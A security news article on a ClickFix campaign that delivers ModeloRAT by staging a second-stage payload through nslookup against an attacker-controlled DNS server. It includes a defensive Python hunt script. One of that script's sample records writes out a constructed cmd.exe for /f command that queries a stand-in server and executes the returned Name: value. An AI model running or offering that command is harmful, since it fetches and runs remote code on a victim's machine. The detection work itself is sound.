New Clickfix Attack Uses DNS Hijacking to Spread Malware


Microsoft Defender researchers have documented a new evolution of the ClickFix social engineering campaign that uses a custom DNS hijacking technique to deliver malware: the victim's own command sends a DNS query to an attacker-controlled server and executes what comes back.

The method tricks users into running a command that uses a DNS lookup to fetch the next stage of the infection, which lets the attackers sidestep detections built around HTTP downloads and blend in with ordinary network traffic.

ClickFix attacks rely on deceiving users through fake error messages, such as bogus CAPTCHA prompts or “fix this issue” notifications on compromised websites.

These lures persuade victims to copy a script to their clipboard and paste it into a native system dialog such as the Windows Run box (Win+R) or a PowerShell prompt.

While previous variants, such as CrashFix, utilized fake browser crashes to create a sense of urgency, this latest iteration focuses on a more technical evasion strategy involving the Domain Name System.

When a victim pastes and runs the initial command, the script uses cmd.exe to perform a command-line DNS lookup in which the attacker-controlled external server is named explicitly as the server to query, so the request never goes through the system's configured resolver.


The script then parses the lookup output, filtering for the Name: line (the label nslookup prints for the host name in the answer).

In this campaign that field does not carry a legitimate server name; the attacker's server fills it with the code for the second-stage payload, which the script executes immediately on the victim's machine.

The technique turns DNS into a lightweight staging channel: the lookup itself acts as a beacon, letting the attackers confirm that a target is live before delivering the heavier malware components.
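The chain described above (an explicit, non-default DNS server named on the command line, the output filtered for Name:, and the result handed back to the interpreter) is visible in process-creation telemetry. The following hunt is an added example, not code from the article, from Microsoft, or from the campaign: it scores constructed Sysmon Event ID 1-style records, where the host names and IP addresses are reserved documentation values and the suspicious command line is a constructed approximation of the behaviour the researchers describe, not a captured sample. Python is used so the check can run over exported logs from any platform.

```python
"""Hunt for the ClickFix DNS-staging pattern in process-creation telemetry.

Added example (not code from the article, Microsoft, or the campaign). Each
record mimics a Sysmon Event ID 1 entry; the records, host names and IPs are
constructed (reserved documentation values), not captured from an incident.
"""
import re

# One nslookup invocation: its arguments run up to the next pipe/separator.
NSLOOKUP_RE = re.compile(r"\bnslookup(?:\.exe)?\b([^|&]*)", re.IGNORECASE)
# The lookup output is filtered for the answer line that nslookup labels "Name:".
PARSE_RE = re.compile(r"\b(?:findstr|find)\b[^|&]*\bName\b", re.IGNORECASE)
# A for /f loop whose body runs the captured token (%i, %%i) or a new interpreter.
EXEC_RE = re.compile(
    r"\bfor\s+/f\b.*?\bdo\s+(?:%%?\w|cmd\b|powershell\b|mshta\b)",
    re.IGNORECASE | re.DOTALL,
)
# Positional nslookup arguments look like host names or IP literals.
POSITIONAL_RE = re.compile(r"[A-Za-z0-9.\-:]+")


def nslookup_invocations(cmdline):
    """Return the positional (non-option) arguments of every nslookup call."""
    calls = []
    for match in NSLOOKUP_RE.finditer(cmdline):
        tokens = match.group(1).split()
        positional = [t for t in tokens
                      if not t.startswith("-") and POSITIONAL_RE.fullmatch(t)]
        calls.append(positional)
    return calls


def assess(record):
    """Score one process-creation record. Returns (verdict, reasons)."""
    cmd = record["CommandLine"]
    reasons = []
    for positional in nslookup_invocations(cmd):
        # "nslookup NAME SERVER": a second positional argument bypasses the
        # system's configured resolver and sends the query to SERVER directly.
        if len(positional) >= 2:
            reasons.append("explicit_resolver:" + positional[1])
    if PARSE_RE.search(cmd):
        reasons.append("output_filtered_for_Name")
    if EXEC_RE.search(cmd):
        reasons.append("for_f_executes_lookup_output")
    if record.get("ParentImage", "").lower().endswith("explorer.exe"):
        reasons.append("parent_explorer")  # what a Win+R Run-box launch looks like

    resolver = any(r.startswith("explicit_resolver:") for r in reasons)
    if resolver and "for_f_executes_lookup_output" in reasons:
        verdict = "high"       # lookup -> parse -> execute chain is complete
    elif resolver and "output_filtered_for_Name" in reasons:
        verdict = "medium"     # parsed, but not obviously executed
    elif resolver:
        verdict = "low"        # admins query specific servers legitimately
    else:
        verdict = "benign"
    return verdict, reasons


SAMPLE_RECORDS = [  # constructed, not real telemetry
    {   # ClickFix-style chain: explicit server, Name: filtered, token executed
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\cmd.exe",
        "CommandLine": 'cmd.exe /c for /f "tokens=1*" %i in '
                       "('nslookup -type=a chk.example.invalid 203.0.113.10 ^| findstr Name') "
                       "do %j",
    },
    {   # ordinary troubleshooting: default resolver, nothing parsed
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "Image": r"C:\Windows\System32\nslookup.exe",
        "CommandLine": "nslookup www.example.com",
    },
    {   # admin querying a specific server and saving the output
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "Image": r"C:\Windows\System32\cmd.exe",
        "CommandLine": r"cmd.exe /c nslookup www.example.com 198.51.100.53 > C:\temp\dns.txt",
    },
]


def hunt(records):
    """Return [(verdict, command line)] for every record that is not benign."""
    hits = []
    for rec in records:
        verdict, _ = assess(rec)
        if verdict != "benign":
            hits.append((verdict, rec["CommandLine"]))
    return hits


if __name__ == "__main__":
    for rec in SAMPLE_RECORDS:
        verdict, reasons = assess(rec)
        print(f"{verdict:7} {reasons} :: {rec['CommandLine']}")
```

The tiers matter in practice: an explicit server argument on its own is routine administrator behaviour and should only raise a low-priority signal, while the same argument combined with a for /f loop that executes the filtered Name: value is the complete staging chain and deserves an alert. A parent of explorer.exe is added as context because a Run-box launch is the typical ClickFix entry point.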

malicious activity (Source: LinkedIn)

Furthermore, because DNS traffic is present on every network and is rarely inspected closely, staging the payload over DNS helps the activity avoid raising alarms. The one thing that does stand out is that the query is sent to an external server other than the resolver the host is configured to use; defenders can look for hosts sending DNS traffic to unsanctioned servers and restrict outbound port 53 to approved resolvers.

Microsoft Defender researchers have also observed that once the second stage is triggered by the DNS response, the attack chain downloads a ZIP file containing a portable Python bundle.

The infection process continues by running a malicious Python script capable of performing host and domain reconnaissance.

To maintain access to the compromised system, the malware establishes persistence by dropping a VBScript file and creating a shortcut named MonitoringService.lnk in the Windows Startup folder, so the script is launched again at every logon.

The final payload delivered in this campaign is a Remote Access Trojan (RAT) identified as ModeloRAT. Microsoft Defender Antivirus detects and blocks this activity under the threat signature Trojan:Win32/ClickFix.R!ml.
